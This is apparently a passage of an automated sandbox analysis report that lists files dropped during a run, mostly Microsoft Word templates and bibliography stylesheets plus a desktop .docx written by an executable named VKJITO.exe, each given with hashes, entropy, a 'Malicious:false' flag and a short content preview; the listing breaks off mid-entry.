                                    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851221[[fn=harvardanglia2008officeonline]].xsl (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):284415
                                    Entropy (8bit):5.00549404077789
                                    Encrypted:false
                                    SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                    MD5:33A829B4893044E1851725F4DAF20271
                                    SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                    SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                    SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851222[[fn=ieee2006officeonline]].xsl (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):294178
                                    Entropy (8bit):4.977758311135714
                                    Encrypted:false
                                    SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                    MD5:0C9731C90DD24ED5CA6AE283741078D0
                                    SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                    SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                    SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):270198
                                    Entropy (8bit):5.073814698282113
                                    Encrypted:false
                                    SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                    MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                    SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                    SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                    SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851224[[fn=iso690nmerical]].xsl (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):217137
                                    Entropy (8bit):5.068335381017074
                                    Encrypted:false
                                    SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                    MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                    SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                    SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                    SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851225[[fn=mlaseventheditionofficeonline]].xsl (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):254875
                                    Entropy (8bit):5.003842588822783
                                    Encrypted:false
                                    SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                    MD5:377B3E355414466F3E3861BCE1844976
                                    SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                    SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                    SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851226[[fn=turabian]].xsl (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):344303
                                    Entropy (8bit):5.023195898304535
                                    Encrypted:false
                                    SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                    MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                    SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                    SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                    SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):250983
                                    Entropy (8bit):5.057714239438731
                                    Encrypted:false
                                    SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                    MD5:F883B260A8D67082EA895C14BF56DD56
                                    SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                    SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                    SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Word 2007+
                                    Category:dropped
                                    Size (bytes):51826
                                    Entropy (8bit):5.541375256745271
                                    Encrypted:false
                                    SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                    MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                    SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                    SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                    SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                    Malicious:false
                                    Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Word 2007+
                                    Category:dropped
                                    Size (bytes):47296
                                    Entropy (8bit):6.42327948041841
                                    Encrypted:false
                                    SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                    MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                    SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                    SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                    SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                    Malicious:false
                                    Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Word 2007+
                                    Category:dropped
                                    Size (bytes):34415
                                    Entropy (8bit):7.352974342178997
                                    Encrypted:false
                                    SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                    MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                    SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                    SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                    SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                    Malicious:false
                                    Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Word 2007+
                                    Category:dropped
                                    Size (bytes):3465076
                                    Entropy (8bit):7.898517227646252
                                    Encrypted:false
                                    SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                    MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                    SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                    SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                    SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                    Malicious:false
                                    Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|

                                    C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):18
                                    Entropy (8bit):2.836591668108979
                                    Encrypted:false
                                    SSDEEP:3:QETlbol9:QEiv
                                    MD5:5FFBAD261CA1D087BDEA2DAA185561A0
                                    SHA1:A961E6EBC140F64BC9CBD47EB820DF77764969AB
                                    SHA-256:2FFE94EBE8D67CD72EE7F1D088DA8AC1B6BA2EBAB80463CC38AC10617ADF933B
                                    SHA-512:DE56BFA3EF7EB40E7D40CCEC2A99795CEEEB708F7D2E47520A6F82AAC3A72D69F4887BF3C515FB0C0136AF6D04DC90E4CBF4A704E13561EC3171373ABAE1D73A
                                    Malicious:false
                                    Preview:..a.l.f.o.n.s.....

                                    C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                    Category:dropped
                                    Size (bytes):2
                                    Entropy (8bit):1.0
                                    Encrypted:false
                                    SSDEEP:3:Qn:Qn
                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                    Malicious:false
                                    Preview:..

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3K1CN3JMZH7T72T07BE9.temp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):12
                                    Entropy (8bit):0.41381685030363374
                                    Encrypted:false
                                    SSDEEP:3:/l:
                                    MD5:E4A1661C2C886EBB688DEC494532431C
                                    SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                    SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                    SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                    Malicious:false
                                    Preview:............

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EBEW2YLS0B5NBUSXJLAR.temp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):12
                                    Entropy (8bit):0.41381685030363374
                                    Encrypted:false
                                    SSDEEP:3:/l:
                                    MD5:E4A1661C2C886EBB688DEC494532431C
                                    SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                    SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                    SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                    Malicious:false
                                    Preview:............

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):12
                                    Entropy (8bit):0.41381685030363374
                                    Encrypted:false
                                    SSDEEP:3:/l:
                                    MD5:E4A1661C2C886EBB688DEC494532431C
                                    SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                    SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                    SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                    Malicious:false
                                    Preview:............

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms~RF37d6e.TMP (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):12
                                    Entropy (8bit):0.41381685030363374
                                    Encrypted:false
                                    SSDEEP:3:/l:
                                    MD5:E4A1661C2C886EBB688DEC494532431C
                                    SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                    SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                    SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                    Malicious:false
                                    Preview:............

                                    C:\Users\user\Desktop\???????.docx

                                    Download File
                                    Process:C:\Users\user\Desktop\VKJITO.exe
                                    File Type:Microsoft Word 2007+
                                    Category:dropped
                                    Size (bytes):11302
                                    Entropy (8bit):7.78963878169505
                                    Encrypted:false
                                    SSDEEP:192:oxrJWWLa/DWjTFQEnxkC7X8t53ZGND1FHGtShPjF3LyvyOmBKOEJrmsvAM3cO:oxrvm/SjTCsxH7X+pGND19GtUPpoxJO2
                                    MD5:FD69658D599611807EE4B8F3E42531BC
                                    SHA1:712DF7C90458621F01D3045EBAAF76455CDF279B
                                    SHA-256:3AFD75C39B4563F333B32F9D5C1119A84FF67596974E9C6B7AC59C7902F1CA81
                                    SHA-512:1893470F3E15A3FFC21F928D6EA1B8C2A59F8353D3ADBC0EA03A8697A5BDC2E0ACF544FAC55EA75A8E93F179EF0D771F352CE2687CBBB103EF3261939A1DD62B
                                    Malicious:false
                                    Preview:PK.........N.@................docProps/PK.........N.@O{Mm\...q.......docProps/app.xml..Qo.0....?....)...i.L..h.r.f.6m5..WdQ...{.mO....m.3h.H.(.....c.o.u0.=c..h#.........FK..r0...&.kk..!.jh...Z..A.Z'....3XIvjAX.c<Ap. *..u.......7....3_.U9.....Z.>:.&..m...dC.`...~ ;.+.a....5.Y.O.9P..w....4=j..9P...6%o.;...`....f... .at..f.J..........P..@..O.J5.Q...v....u.....F......m....A<...x.T.2J..'y2.S..|I.0..R.`'..{.P.O.W...PK.........N.@....=...[.......docProps/core.xml...N.0.E.H.C.}.<..$..uE%$.x.,{.Z...........,.{......^..'X'..P..(..4.....f._..y.8m......e}yQ2C...`.....(..#.Th.!.;..I]..*.[m%..h.l({...<M.X...z.{`l&"...MH.a......$(.p.d....J.g...9....f..9;..{..d...!F.....0j,T.V.P]r6.#...... .v'...P...,..8..9).2..J|r..=...^...uo.n.u...u..V..9.+PM...S49...mF..Y..........PK.........N.@.&..*...........docProps/custom.xml...K.0....C.=...2.5]A<(..Ji..&%I.C...S<x.......{/Y..}p..vZ.....R.....O.%\...J5U..L.QZ....{.Gi\'m...`..D..{9T6...I..P9_...m....4H...8F.d......g..

                                    C:\Users\user\Desktop\~$??????.docx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):162
                                    Entropy (8bit):4.418155720831298
                                    Encrypted:false
                                    SSDEEP:3:0sk72906xkA/mJQxOfgSRGGXTkM+uU0YPRaa122k:0sU22aJ+2G3UhP8Jf
                                    MD5:D17076CC1684CD585FF2A994205F7134
                                    SHA1:36A64DBB913E8F8ADDC8D2779320DCB735C76E95
